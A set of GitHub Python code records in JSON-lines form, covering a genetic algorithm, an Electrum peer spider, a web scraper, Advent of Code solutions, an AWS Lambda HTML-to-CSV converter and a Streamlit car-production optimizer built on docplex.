os.getenv('CGSN', 'localsimulator')\n\n        # try alias resolution and then create CGSNClient instance:\n        uri = cls._uri_aliases.get(uri, uri)\n        host, port = tuple(uri.split(':'))\n        address = (host, int(port))\n        instance = CGSNClient(address)\n        if log.isEnabledFor(logging.DEBUG):\n            log.debug(\"Created CGSNClient for endpoint at: %s:%i\" % address)\n\n        return instance\n","repo_name":"ooici/coi-services","sub_path":"ion/agents/platform/cgsn/cgsn_client_factory.py","file_name":"cgsn_client_factory.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"39240715315","text":"\"\"\"\ngenetic_algorithm.py: the base genetic_algorithm class.\n\n\"\"\"\n\nimport numpy as np\nimport multiprocessing as mp\nimport logging\nimport random\nimport os\n\nif __package__ == '':\n    from genom_struct import GenomStruct\nelse:\n    from .genom_struct import GenomStruct\n\n\n__author__ = \"Mostafa Rafaie\"\n__license__ = \"APLv2\"\n\n\nclass GeneticAlgorithm:\n    LOGGER_HANDLER_NAME = 'GA_LOG_HANDLER'\n\n    # Cross Over Types\n    SINGLE_POINT_CROSSOVER = 0\n    TWO_POINT_CROSSOVER = 1\n    CUT_SLICE_CROSSOVER = 2\n    UNIFORM_CROSSOVER = 3\n\n    TOURNAMENT_SIZE = 3\n\n    def __init__(self, path, log_level=None):\n        self.path = path\n        self.gs = GenomStruct(path)\n        self.logger = logging.getLogger(GeneticAlgorithm.LOGGER_HANDLER_NAME)\n        self.log_level = log_level\n        if log_level is not None:\n            self.logger.setLevel(log_level)\n\n        self.CROSSOVER_FUNCTIONS = {GeneticAlgorithm.SINGLE_POINT_CROSSOVER:\n                                    self.do_crossover_single_point,\n                                    GeneticAlgorithm.TWO_POINT_CROSSOVER:\n                                    self.do_crossover_two_point,\n                                    GeneticAlgorithm.CUT_SLICE_CROSSOVER:\n                                    self.do_crossover_cut_slice,\n                                    GeneticAlgorithm.UNIFORM_CROSSOVER:\n                                    self.do_crossover_uniform}\n\n    # Cross Over functions\n    def do_crossover_single_point(self, genom1, genom2):\n        c = random.randint(1, self.gs.size() - 2)\n        return list(genom1[:c]) + list(genom2[c:-1]) + [0.0]\n\n    def do_crossover_two_point(self, genom1, genom2):\n        if self.gs.size() <= 3:\n            return 
[genom1[0], genom2[1], genom1[2], 0.0] # for small genomes (size <= 3) simply alternate single genes; the previous indices ran past the gene range\n\n        c1 = random.randint(0, self.gs.size() - 2)\n        c2 = random.randint(c1, self.gs.size() - 1)\n        return list(genom1[:c1]) + list(genom2[c1:c2]) + list(genom1[c2:-1]) \\\n            + [0.0]\n\n    def do_crossover_cut_slice(self, genom1, genom2):\n        c1 = random.randrange(0, self.gs.size() - 1)\n        c2 = random.randrange(0, self.gs.size() - 1)\n        g = list(genom1[:c1]) + list(genom2[c2:])\n        g = g[:self.gs.size()]\n        print(len(g), g)\n        if len(g) < self.gs.size():\n            g += self.gs.random_genom()[len(g):]\n\n        return g + [0.0]\n\n    def do_crossover_uniform(self, genom1, genom2):\n        g = []\n        for i in range(self.gs.size()):\n            if random.randint(0, 1) == 1:\n                g.append(genom1[i])\n            else:\n                g.append(genom2[i])\n\n        return g + [0.0]\n\n    def do_crossover(self, type, genom1, genom2):\n        return self.CROSSOVER_FUNCTIONS[type](genom1, genom2)\n\n    # Run the GA Algorithm\n    def init_generation(self, init_population_size):\n        self.logger.info('init_generation is started running')\n\n        p = []\n        counter = 0\n        while counter < init_population_size:\n            d = self.gs.random_genom() + [0.0]\n            if d not in p:\n                p.append(d)\n                counter += 1\n\n        population = np.array(p, dtype=np.float64)\n\n        self.logger.info('initialize the generation with the size of {}'.\n                         format(len(population)))\n\n        return population\n\n    def init_ga(self, init_population_size, path=None):\n        if path is not None:\n            self.gs = GenomStruct(path)\n\n        return self.init_generation(init_population_size)\n\n    def evaluate_fitness_partial(population, fitness, log_level):\n        logger = logging.getLogger(GeneticAlgorithm.LOGGER_HANDLER_NAME)\n        log_level = log_level\n        logger.info('Start evaluating the partial fitness function ' +\n                    'for population (size = {})'.format(len(population)))\n\n        for g in population:\n            g[-1] = fitness(g)\n        return population\n\n    def evaluate_fitness(self, population, fitness, cuncurrency=1):\n        self.logger.info('Start evaluating the fitness function')\n        sub_p = np.array_split(population, cuncurrency)\n        pool = mp.Pool(processes=cuncurrency)\n        results = [pool.apply_async(GeneticAlgorithm.evaluate_fitness_partial,\n                                    args=(sub_p[i], fitness, self.log_level))\n                   for i in range(cuncurrency)]\n\n        output = [p.get() for p in results]\n        pool.close()\n\n        self.logger.info('Finish evaluating the fitness function')\n\n        return np.concatenate(output)\n\n    def check_stop_condition(self, population, num_iteratitions, iteratition,\n                             fitness_goal, reverse_fitness_order):\n        self.logger.info('Check stop Condition iteration ' +\n                         '{}'.format(iteratition))\n\n        if iteratition > num_iteratitions:\n            self.logger.info('Stop Condition: True. iteratitions>' +\n                             'num_iteratitions({}>{})'.format(num_iteratitions,\n                                                              iteratition))\n            return False\n\n        if population[0, -1] < fitness_goal and \\\n           reverse_fitness_order is False:\n            self.logger.info('Stop Condition: True. Satisfied Fitness_goal!' +\n                             'population[0, -1] < fitness_goal' +\n                             '({}<{})'.format(population[0, -1], fitness_goal))\n            return False\n\n        if population[0, -1] > fitness_goal and \\\n           reverse_fitness_order is True:\n            self.logger.info('Stop Condition: True. Satisfied Fitness_goal!' 
+\n 'population[0, -1] > fitness_goal' +\n '({}>{})'.format(population[0, -1], fitness_goal))\n return False\n\n return True\n\n def choose_best_population(self, population, population_size,\n reverse=False):\n if reverse is True:\n return population[(-population[:, -1]).argsort()][:population_size]\n return population[population[:, -1].argsort()][:population_size]\n\n def tournament_selection(self, population):\n g = random.choice(population)\n\n for i in range(GeneticAlgorithm.TOURNAMENT_SIZE):\n g1 = random.choice(population)\n if g1[-1] > g[-1]:\n g = g1\n\n return g\n\n def do_mutate(self, g):\n i = random.choice(self.gs.rand_c_options())\n g[i] = self.gs.rand(i)\n return g\n\n def gen_next_generation(self, population, population_size, mutation_rate,\n crossover_type, fitness_func, fitness_goal,\n cuncurrency=1):\n self.logger.info('Generate the next generation')\n\n new_p = []\n while len(new_p) != population_size:\n parent1 = self.tournament_selection(population)\n parent2 = self.tournament_selection(population)\n\n child = self.do_crossover(crossover_type, parent1, parent2)\n if random.uniform(0, 1) < mutation_rate:\n child = self.do_mutate(child)\n\n if child not in new_p:\n new_p.append(child)\n\n new_population = np.array(new_p, dtype=np.float64)\n new_population = self.evaluate_fitness(new_population, fitness_func,\n cuncurrency)\n return new_population\n\n def reload_np_population(self, population, population_size,\n population_np_path, reload_np_population_rate):\n if os.path.isfile(population_np_path) is not True:\n return population\n\n p = np.load(population_np_path)\n n = min(int(reload_np_population_rate * population_size), len(p))\n self.logger.info('reload_np_population ' +\n 'file \"{}\", '.format(population_np_path) +\n 'rate = {}, '.format(reload_np_population_rate) +\n ', count = {}'.format(n))\n\n return np.concatenate((population, p[:n]), axis=0)\n\n def run(self, init_population_size, population_size,\n mutation_rate, num_iteratitions, crossover_type,\n fitness_func, fitness_goal,\n cuncurrency=1, reverse_fitness_order=False, path=None,\n population_np_path=None, reload_np_population_rate=0.1):\n\n iteratition = 1\n population = self.init_ga(init_population_size, path)\n\n if population_np_path is not None:\n population = self.reload_np_population(population,\n population_size,\n population_np_path,\n reload_np_population_rate)\n\n population = self.evaluate_fitness(population, fitness_func,\n cuncurrency)\n\n population = self.choose_best_population(population,\n population_size,\n reverse_fitness_order)\n\n while self.check_stop_condition(population, num_iteratitions,\n iteratition, fitness_goal,\n reverse_fitness_order):\n self.logger.info('start iteration \"{}\" '.format(iteratition))\n\n new_population = self.gen_next_generation(population,\n population_size,\n mutation_rate,\n crossover_type,\n fitness_func,\n fitness_goal,\n cuncurrency)\n\n population = np.concatenate((population, new_population), axis=0)\n population = self.choose_best_population(population,\n population_size,\n reverse_fitness_order)\n iteratition += 1\n self.logger.info('population[:3].astype(float) : ' +\n '{}'.format(population[:3].astype(float)))\n self.logger.info('fitness_value,{},{}'\n .format(iteratition, ','.join(population[:, -1]\n .astype(str))))\n\n return 
population\n","repo_name":"rafaie/genetic_algorithm","sub_path":"genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":10480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12324303537","text":"from yowsup.structs import ProtocolEntity, ProtocolTreeNode\nfrom .notification_picture import PictureNotificationProtocolEntity\nclass SetPictureNotificationProtocolEntity(PictureNotificationProtocolEntity):\n '''\n \n \n \n \n '''\n\n def __init__(self, _id, _from, status, timestamp, notify, offline, setJid, setId):\n super(SetPictureNotificationProtocolEntity, self).__init__(_id, _from, timestamp, notify, offline)\n self.setData(setJid, setId)\n\n def setData(self, setJid, setId):\n self.setId = setId\n self.setJid = setJid\n \n def toProtocolTreeNode(self):\n node = super(SetPictureNotificationProtocolEntity, self).toProtocolTreeNode()\n setNode = ProtocolTreeNode(\"set\", {\"jid\": self.setJid, \"id\": self.setId}, None, None)\n node.addChild(setNode)\n return node\n\n @staticmethod\n def fromProtocolTreeNode(node):\n entity = PictureNotificationProtocolEntity.fromProtocolTreeNode(node)\n entity.__class__ = SetPictureNotificationProtocolEntity\n setNode = node.getChild(\"set\")\n entity.setData(setNode.getAttributeValue(\"jid\"), setNode.getAttributeValue(\"id\"))\n return entity","repo_name":"tgalal/yowsup","sub_path":"yowsup/layers/protocol_notifications/protocolentities/notification_picture_set.py","file_name":"notification_picture_set.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":6953,"dataset":"github-code","pt":"52"} +{"seq_id":"295460216","text":"#! /usr/bin/env python3\n#\n# Find all Electrum servers, everywhere... It will connect to one at random (from\n# a hard-coded list) and then expand it's list of peers based on what it sees\n# at each server.\n#\n# THIS IS A DEMO PROGRAM ONLY. 
It would be anti-social to run this frequently or\n# as part of any periodic task.\n#\nimport sys, asyncio, argparse\nfrom connectrum.client import StratumClient\nfrom connectrum.svr_info import KnownServers\n\nks = KnownServers()\n\nconnected = set()\nfailed = set()\n\nasync def probe(svr, proto_code, use_tor):\n conn = StratumClient()\n\n try:\n await conn.connect(svr, proto_code, use_tor=(svr.is_onion or use_tor), short_term=True)\n except:\n failed.add(str(svr))\n return None\n\n peers, _ = conn.subscribe('server.peers.subscribe')\n\n peers = await peers\n print(\"%s gave %d peers\" % (svr, len(peers)))\n\n connected.add(str(svr))\n\n # track them all.\n more = ks.add_peer_response(peers)\n\n if more:\n print(\"found %d more servers from %s: %s\" % (len(more), svr, ', '.join(more)))\n \n\n conn.close()\n\n return str(svr)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Interact with an electrum server')\n\n parser.add_argument('servers', default=[], metavar=\"server_list.json\", nargs='*',\n help='JSON file containing server details')\n parser.add_argument('--protocol', default='t', choices='ts',\n help='Protocol code: t=TCP Cleartext, s=SSL, etc')\n parser.add_argument('--tor', default=False, action=\"store_true\",\n help='Use local Tor proxy to connect (localhost:9150)')\n parser.add_argument('--onion', default=None, action=\"store_true\",\n help='Select only servers operating an .onion name')\n parser.add_argument('--irc', default=False, action=\"store_true\",\n help='Use IRC channel to find servers')\n parser.add_argument('--output', default=None,\n help='File to save resulting server list into (JSON)')\n parser.add_argument('--timeout', default=30, type=int,\n help='Total time to take (overall)')\n\n args = parser.parse_args()\n\n if args.irc:\n print(\"Connecting to freenode #electrum... 
(slow, be patient)\")\n ks.from_irc()\n\n for a in args.servers:\n ks.from_json(a)\n\n #ks.from_json('../connectrum/servers.json')\n\n if not ks:\n print(\"Please use --irc option or a list of servers in JSON on command line\")\n sys.exit(1)\n\n print(\"%d servers are known to us at start\" % len(ks))\n\n loop = asyncio.get_event_loop() \n\n # cannot reach .onion if not using Tor; so filter them out\n if not args.tor:\n args.onion = False\n\n candidates = ks.select(protocol=args.protocol, is_onion=args.onion)\n print(\"%d servers are right protocol\" % len(candidates))\n\n all_done = asyncio.wait([probe(i, args.protocol, args.tor) for i in candidates],\n timeout=args.timeout)\n\n loop.run_until_complete(all_done)\n loop.close()\n\n if not connected:\n print(\"WARNING: did not successfully connect to any existing servers!\")\n else:\n print(\"%d servers connected and answered correctly\" % len(connected))\n\n if failed:\n print(\"%d FAILURES: \" % len(failed))\n for i in failed:\n print(' %s' % i)\n\n print(\"%d servers are now known\" % len(ks))\n if 0:\n for i in ks.values():\n print(' %s [%s]' % (i.hostname, ' '.join(i.protocols)))\n\n if args.output:\n ks.save_json(args.output)\n \n# EOF\n","repo_name":"coinkite/connectrum","sub_path":"examples/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"52"} +{"seq_id":"14764550491","text":"from constraint import *\n\n\ndef sostanok(simona, marija, petar, sostanoci):\n if simona == 1 and marija == 1 and petar == 0 and sostanoci == 14 \\\n or simona == 1 and marija == 0 and petar == 1 and sostanoci == 19 \\\n or simona == 1 and marija == 0 and petar == 1 and sostanoci == 16 \\\n or simona == 1 and marija == 0 and petar == 1 and sostanoci == 13:\n return True\n else:\n return None\n\n\nif __name__ == '__main__':\n problem = Problem(BacktrackingSolver())\n termini_za_sostanok = [12, 13, 14, 15, 16, 17, 18, 19]\n problem.addVariable(\"Simona_prisustvo\", [0, 1])\n problem.addVariable(\"Marija_prisustvo\", [0, 1])\n problem.addVariable(\"Petar_prisustvo\", [0, 1])\n problem.addVariable(\"vreme_sostanok\", termini_za_sostanok)\n problem.addConstraint(sostanok, [\"Simona_prisustvo\", \"Marija_prisustvo\", \"Petar_prisustvo\", \"vreme_sostanok\"])\n resenie = {\"Simona_prisustvo\": 0, \"Marija_prisustvo\": 0, \"Petar_prisustvo\": 0, \"vreme_sostanok\": 0}\n resenija = problem.getSolutions()\n for res in resenija:\n for key, value in res.items():\n if key == \"Simona_prisustvo\":\n resenie[\"Simona_prisustvo\"] = value\n if key == \"Marija_prisustvo\":\n resenie[\"Marija_prisustvo\"] = value\n if key == \"Petar_prisustvo\":\n resenie[\"Petar_prisustvo\"] = value\n if key == \"vreme_sostanok\":\n resenie[\"vreme_sostanok\"] = value\n print(resenie)","repo_name":"StefBelcev/PythonCourse","sub_path":"exercises/lab02/sostanok_kolegi1.py","file_name":"sostanok_kolegi1.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71276405606","text":"#!/usr/bin/python3\n\"\"\"\nReturns a matrix divided by input value\n\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"\n Divides all elements of matrix and makes a new matrix\n \"\"\"\n if not all(isinstance(row, list) for row in matrix):\n raise TypeError(\"matrix must be a matrix (list of lists)\")\n if not all(isinstance(i, (int,float)) for row in matrix for i in row):\n raise TypeError(\"matrix 
must be a matrix (list of lists) of integers/floats\")\n if not all(len(row) == len(matrix[0]) for row in matrix):\n raise TypeError(\"Each row of the matrix must have the same size\")\n if not isinstance(div, (int,float)):\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n return [[round(i/div, 2) for i in row] for row in matrix]","repo_name":"DustinDavis02/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4039342862","text":"import boto3\nimport os\nfrom bs4 import BeautifulSoup\nfrom botocore.exceptions import ClientError\n\n\ndef html_to_csv(html):\n soup = BeautifulSoup(html, features='html5lib')\n rows = soup.find_all('tr')\n\n tables_rows = [\n [el.text for el in els] for els in [row.find_all(['p', 'span']) for row in rows[1:]]\n ]\n\n first_10_rows = [','.join([r[2], r[3], r[4]]) for r in tables_rows[:10]]\n\n rest_rows = [','.join([r[3], r[4], r[5]]) for r in tables_rows[10:]]\n\n header = 'name,symbol,price\\n'\n csv = header + '\\n'.join(first_10_rows + rest_rows)\n\n return csv\n\n\ndef get_html_object(bucket, object_key):\n try:\n s3_client = boto3.client('s3')\n html_object = s3_client.get_object(\n Bucket=bucket,\n Key=object_key\n )\n except ClientError as e:\n raise e\n\n return html_object\n\n\ndef handler(event, context):\n html_object_key = event['html_object_key']\n html_object = get_html_object(\n os.environ['RAW_DATA_BUCKET'], html_object_key)\n html_content = html_object['Body'].read()\n\n return {\n 'object_key': html_object_key.replace('.html', '.csv'),\n 'data': html_to_csv(html_content)\n }\n","repo_name":"pharesdiego/aws-crypto-prices-miner","sub_path":"lambdas/transform_coinmarketcap/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27699595632","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution(object):\r\n def linklist_to_str(self,linklst):\r\n str = \"\"\r\n while linklst:\r\n if str == \"\":\r\n str = linklst.val\r\n linklst = linklst.next\r\n else:\r\n str = \"{}{}\".format(linklst.val, str)\r\n linklst = linklst.next\r\n return str\r\n def addTwoNumbers(self, l1, l2):\r\n \"\"\"\r\n :type l1: ListNode = [2,4,3]\r\n :type l2: ListNode = [5,6,4]\r\n :rtype: ListNode\r\n \"\"\"\r\n a = self.linklist_to_str(l1) #a=342\r\n b = self.linklist_to_str(l2) #b=465\r\n c = str(int(a)+int(b)) #c=807\r\n d = c[::-1] #d=708\r\n \r\n self.head = ListNode(d[0])\r\n r = self.head\r\n p = self.head\r\n for i in d[1:]:\r\n node = ListNode(i)\r\n p.next = node\r\n p = p.next\r\n return r\r\n","repo_name":"ChubbyMeg/singel-tool","sub_path":"addTwoNumbers.py","file_name":"addTwoNumbers.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27238640007","text":"import requests\nimport bs4\nfrom fake_useragent import UserAgent\nfrom progress.bar import IncrementalBar\nimport time\n\n\ndef request_html_data(url, urn=None):\n fake_ua = UserAgent()\n headers = {'User-Agent': str(fake_ua.chrome)}\n if urn is None:\n response = 
requests.get(url, headers=headers)\n else:\n response = requests.get(url+urn, headers=headers)\n\n return response.text\n\n\ndef check_keywords(html_code, keywords, url):\n posts = ''\n soup = bs4.BeautifulSoup(html_code, features='html.parser')\n articles = soup.find_all('article')\n for article in articles:\n text = article.text\n text_list = text.split()\n href = article.find(class_='tm-article-snippet__title-link').attrs['href'][1:]\n link_ = url + href\n for keyword in keywords:\n if keyword in text_list:\n bar.next()\n title = article.find(class_='tm-article-snippet__title tm-article-snippet__title_h2')\n title_text = title.find('span').text\n date_cont = article.find(class_='tm-article-snippet__datetime-published')\n date = date_cont.find('time').attrs['title'][0:10]\n posts += f'\\n-------\\n{date}\\n{title_text}\\n{link_}'\n else:\n bar.next()\n html_data = request_html_data(url, href)\n post_soup = bs4.BeautifulSoup(html_data, features='html.parser')\n post_text = soup.find(class_='article-formatted-body article-formatted-body '\n 'article-formatted-body_version-2').text\n if keyword in post_text:\n title = post_soup.find(class_='tm-article-snippet__title tm-article-snippet__title_h1')\n title_text = title.find('span').text\n date = post_soup.find(class_='tm-article-snippet__datetime-published').find('title')[0:10]\n posts += f'\\n-------\\n{date}\\n{title_text}\\n{link_}'\n\n return posts\n\n\nif __name__ == '__main__':\n KEYWORDS = ['дизайн', 'фото', 'web', 'python']\n URL = 'https://habr.com/ru/all/'\n html_data = request_html_data(URL)\n bar = IncrementalBar('Поиск статей')\n\n bar.start()\n posts_result = check_keywords(html_data, KEYWORDS, URL)\n bar.finish()\n print('Поиск статей завершён!')\n time.sleep(1)\n print(posts_result)\n","repo_name":"Xypmich/hw_web_scraping","sub_path":"scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6044939703","text":"class SonarSweeper:\n def get_input(self):\n \"\"\"\n Reads text file and converts inputs to a list of inputs.\n \"\"\"\n\n input_ = open(\"advent_of_code_2021/inputs/day1.txt\", \"r\")\n input_ = input_.read().strip().split(\"\\n\")\n\n self.input = input_\n\n def find_measurement_increases(self):\n \"\"\"\n Finds the number of times the depth increases from\n a previous measurement.\n \"\"\"\n\n measurement_increase_count = 0\n previous_measurement = 0\n\n for measurement in self.input:\n\n if self.input.index(measurement) > 0:\n measurement = int(measurement)\n\n if measurement > previous_measurement:\n measurement_increase_count += 1\n\n previous_measurement = int(measurement)\n\n self.increase_count = measurement_increase_count\n\n def find_triple_measurement_increases(self):\n \"\"\"\n Finds the amount of times the sum of 3 consecutive measurements\n increases from a previous sum of 3 consecutive measurements.\n \"\"\"\n\n measurement_increase_count = 0\n triple_measurement = []\n previous_triple_measurement_sum = 0\n\n for measurement in self.input:\n\n measurement = int(measurement)\n triple_measurement.append(measurement)\n \n if len(triple_measurement) >= 3:\n\n if sum(triple_measurement) > previous_triple_measurement_sum and previous_triple_measurement_sum != 0:\n measurement_increase_count += 1\n\n previous_triple_measurement_sum = sum(triple_measurement)\n triple_measurement.remove(triple_measurement[0])\n\n self.increase_count = measurement_increase_count\n\n def 
\n    def results(self):\n        \"\"\"\n        Prints the total amount of increases in the sonar sweeper's depth measurements.\n        \"\"\"\n\n        print(f\"Total increases in depth measurements: {self.increase_count}\")\n\n\ndef main():\n\n    \"\"\"Part 1\"\"\"\n    # ss = SonarSweeper()\n    # ss.get_input()\n    # ss.find_measurement_increases()\n    # ss.results()\n\n    \"\"\"Part 2\"\"\"\n    ss = SonarSweeper()\n    ss.get_input()\n    ss.find_triple_measurement_increases()\n    ss.results()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"riobeggs/advent_of_code","sub_path":"advent_of_code_2021/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"9873716320","text":"# compare each new line against every line seen so far; print the common\n# characters of the pair that differs in exactly one position\nseen = set()\nfor s in open('aoc2.txt'):\n\tseen.add(s)\n\t\n\tfor b in seen:\n\t\tdiffs = 0\n\t\tfor c, d in zip(b, s):\n\t\t\tif c != d:\n\t\t\t\tdiffs += 1\n\t\tif diffs == 1:\n\t\t\tout = ''\n\t\t\tfor p, q in zip(s,b):\n\t\t\t\tif p==q:\n\t\t\t\t\tout += p\n\t\t\tprint(out)\n\t\t\t","repo_name":"stehal/aoc2018","sub_path":"aoc2_2.py","file_name":"aoc2_2.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"30909683101","text":"points = 12\r\n\r\ndef which_prize(points):\r\n\twooden_rabbit = 50\r\n\tno_prize = 150\r\n\twafer_thin = 180\r\n\tpenguin = 200\r\n\tif points <= wooden_rabbit:\r\n\t\tprize = \"wooden rabbit\"\r\n\telif points <= no_prize:\r\n\t\tprize = \"No prize\"\r\n\telif points <= wafer_thin:\r\n\t\tprize = \"wafer-thin mint\"\r\n\telif points <= penguin:\r\n\t\tprize = \"penguin\"\r\n\telse:\r\n\t\tprize = \"No prize\"\r\n\tif 51 <= points <= 150:\r\n\t\treturn \"Oh dear, no prize this time.\"\r\n\telse:\r\n\t\treturn \"Congratulations! 
You have won a \" + prize + \"!\"\r\n\t\r\nprint (which_prize(points))","repo_name":"A3ex1984/hello_world","sub_path":"prize.py","file_name":"prize.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1604758452","text":"import streamlit as st\r\nfrom docplex.mp.model import Model\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport seaborn as sns\r\n\r\nst.write(\"\"\"\r\n# Car Production Planning App\r\n\r\nThis model is an extension of the https://suresh-abeyweera.medium.com/optimization-with-python-docplex-beginners-guide-d54b77ac715d\r\n \\n This demo shows the integration of Streamlit with docplex\r\n\r\n\r\n\"\"\")\r\n\r\n \r\nimage = Image.open('car1.jpg')\r\nst.image(image)\r\n\r\nst.sidebar.header('User Input Values')\r\nst.sidebar.write('Select the parameter values')\r\n\r\nsidebar_expander_demand = st.sidebar.expander(\"Car Demand Values\")\r\nwith sidebar_expander_demand:\r\n \r\n selected_carA_lower_bound = st.slider('Minimum Car A Units', 10, 100,10,key = \"carA_lower_bound\")\r\n selected_carB_lower_bound = st.slider('Minimum Car B Units', 10, 100,10,key = \"carB_lower_bound\")\r\n\r\n \r\nsidebar_expander_profit = st.sidebar.expander(\"Car Profit Values\")\r\nwith sidebar_expander_profit:\r\n \r\n selected_carA_profit = st.slider('Profits by Selling 1 Unit of CarA', 10, 100,12,key = \"carA_profit\")\r\n selected_carB_profit = st.slider('Profits by Selling 1 Unit of CarB', 10, 100,15,key = \"carB_profit\")\r\n\r\n\r\nsidebar_expander_assembly = st.sidebar.expander(\"Assembly Time(Days)\")\r\nwith sidebar_expander_assembly:\r\n \r\n selected_carA_assemble_time = st.slider('Days Spent for Assembling 1 Unit of CarA', 0.1, 0.5,0.5,key = \"carA_assemble_time\")\r\n selected_carB_assemble_time = st.slider('Days Spent for Assembling 1 Unit of CarB', 0.1, 0.5,0.25,key = \"carB_assemble_time\")\r\n\r\nsidebar_expander_paintfinish = st.sidebar.expander(\"Painting and Finishing Time(Days)\")\r\nwith sidebar_expander_paintfinish:\r\n \r\n selected_carA_paint_finish_time = st.slider('Days Spent for Assembling 1 Unit of CarA', 0.1, 0.5,0.15,key = \"carA_paint_finish_time\")\r\n selected_carB_paint_finish_time = st.slider('Days Spent for Painting and Finishing 1 Unit of CarB', 0.1, 0.5,0.1,key = \"carB_paint_finish_time\")\r\n\r\nsidebar_expander_capacity = st.sidebar.expander(\"Capacity Constraints\")\r\nwith sidebar_expander_capacity:\r\n \r\n selected_max_capacity_assemblyline = st.slider('Maximum Capacity for Assembly Line', 10, 100,20,key = \"max_capacity_assemblyline\")\r\n selected_max_capacity_paintfinishline = st.slider('Maximum Capacity for Painting & Finishing Line', 10, 100,10,key = \"max_capacity_paintfinishline\")\r\n\r\nmy_model = Model(name='Car_Production')\r\n\r\nCarA = my_model.integer_var(name='CarA')\r\nCarB = my_model.integer_var(name='CarB')\r\n\r\n\r\n# constraint #1: CarA production is greater than 10\r\nmy_model.add_constraint(CarA >= selected_carA_lower_bound)\r\n\r\n# constraint #2: CarB production is greater than 10\r\nmy_model.add_constraint(CarB >= selected_carB_lower_bound)\r\n\r\nimport pandas as pd\r\nlist_of_lists = []\r\nlist_of_lists.append(['CarA',selected_carA_assemble_time,selected_carA_paint_finish_time,selected_carA_lower_bound,selected_carA_profit])\r\nlist_of_lists.append(['CarB',selected_carB_assemble_time,selected_carB_paint_finish_time,selected_carB_lower_bound,selected_carB_profit])\r\n\r\ndf = pd.DataFrame(list_of_lists, 
columns=['Car Type', 'Days - assemble', 'Days - paint and finish', 'Minimum Production','Profits'])\r\n\r\nst.subheader('User Input parameters')\r\nst.write(df)\r\n\r\n# constraint #3: Assembly Line has a Maximum Capacity Limitation\r\nct_assembly = my_model.add_constraint( selected_carA_assemble_time * CarA + selected_carB_assemble_time * CarB <= selected_max_capacity_assemblyline)\r\n\r\n# constraint #4: Painting and Finishing Line has a Maximum Capacity Limitation.\r\nct_painting = my_model.add_constraint( selected_carA_paint_finish_time * CarA + selected_carB_paint_finish_time * CarB <= selected_max_capacity_paintfinishline)\r\n\r\n\r\nmy_model.maximize(selected_carA_profit * 1000* CarA + selected_carB_profit * 1000 * CarB)\r\n\r\n\r\n\r\nif st.button('Solve Model'):\r\n    \r\n    solution = my_model.solve()\r\n\r\n    solve_time = my_model.solve_details.time\r\n    solve_status = my_model.solve_details.status\r\n\r\n\r\n\r\n    print(solution)\r\n    my_model.print_solution()\r\n\r\n    st.subheader('Solve Status')\r\n    st.write(solve_status)\r\n\r\n    st.subheader('Solve Time')\r\n    st.write(\"%.5f\" % round(solve_time, 5)+ \" Seconds\")\r\n\r\n    if solve_status == \"integer optimal solution\":\r\n
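        # CPLEX reports a solved MIP with the status string 'integer optimal solution';\r\n        # any other outcome (infeasible, time limit, ...) falls through to the else branch below.\r\n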
        st.markdown(\"\"\"\"\"\", unsafe_allow_html=True)\r\n        col1, col2 = st.columns(2)\r\n        \r\n        carA_solution = solution.get_value(CarA)\r\n        carB_solution = solution.get_value(CarB)\r\n        \r\n        col1.subheader('Car A Production')\r\n        col1.write(str(int(carA_solution)) + \" Cars\")\r\n\r\n        col2.subheader('Car B Production')\r\n        col2.write(str(int(carB_solution))+ \" Cars\")\r\n\r\n\r\n        carA_profit_solution = selected_carA_profit * 1000* carA_solution\r\n        carB_profit_solution = selected_carB_profit * 1000* carB_solution\r\n        \r\n        \r\n        solution_lists = []\r\n        solution_lists.append(['CarA',carA_solution,carA_profit_solution,carA_solution * selected_carA_assemble_time, carA_solution * selected_carA_paint_finish_time])\r\n        solution_lists.append(['CarB',carB_solution,carB_profit_solution,carB_solution* selected_carB_assemble_time, carB_solution * selected_carB_paint_finish_time])\r\n\r\n        df_solution = pd.DataFrame(solution_lists, columns=[\"Car Type\", \"Number of Cars\", \"Profit\" ,\"Assembly Time\", \"Painting & Finishing Time\"])\r\n        st.write(df_solution)\r\n        \r\n        \r\n        col1.subheader('Car A Profit')\r\n        col1.write(str(carA_profit_solution)+ \" Dollars\")\r\n\r\n        col2.subheader('Car B Profit')\r\n        